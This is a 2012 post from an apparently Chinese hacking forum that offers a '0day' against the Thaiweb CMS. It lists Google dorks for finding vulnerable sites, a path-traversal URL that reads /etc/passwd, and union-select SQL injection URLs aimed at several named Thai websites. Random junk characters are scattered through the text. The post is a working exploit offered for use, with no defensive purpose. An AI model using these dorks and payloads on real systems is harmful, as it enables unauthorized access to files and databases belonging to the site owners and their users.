找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2116|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
  L5 [) N4 r8 j; k6 C3 A/ G
' ~# W1 T% s9 h, L; X% Ointext:powered by Thaiweb' m$ R% Y/ o( n7 O8 v8 A, l. L% O+ E% ]

  h  e% U/ J: ~3 L, K# r/ z0 Vinurl:index.php?page=board.php# Z, S! ], Y1 J$ |" S
% t: _5 H8 }6 _* B* l/ \

& u, B( t/ A! V3 u
% V9 t' H6 [) x8 z利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd0 h% W6 [& ?; I4 r! P5 t
8 L/ d/ e$ g, m

0 o8 b9 g$ `$ I+ ~& }# _1 i9 H! _) D; z8 O1 h+ {
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'% [5 G) W: ]2 j1 T% t9 M% n8 ?- R. ^
& Z0 T3 [, \! J8 [) M
) l6 ]: ?5 M) S* d% k/ C, `0 @

2 v9 m" u8 _" f4 r! ~" Z* W/ Q4 L3 Jhttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--( Y  M, _0 @. N0 o4 e# G
* {# m$ I9 V8 y, n
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--) Z/ W+ g* [6 G

) U+ _+ O- N- g' J8 c# }5 S7 Qhttp://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--! D# P; U' D. V# j$ M& T) ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表